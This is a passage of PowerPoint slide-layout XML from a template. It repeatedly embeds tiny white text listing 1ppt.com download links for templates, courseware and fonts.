              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout185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85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85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85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8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86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86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86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86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86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86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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout186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86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86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86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8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87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87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87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87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87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87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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout187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87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87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87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8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88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88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88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88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88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88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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
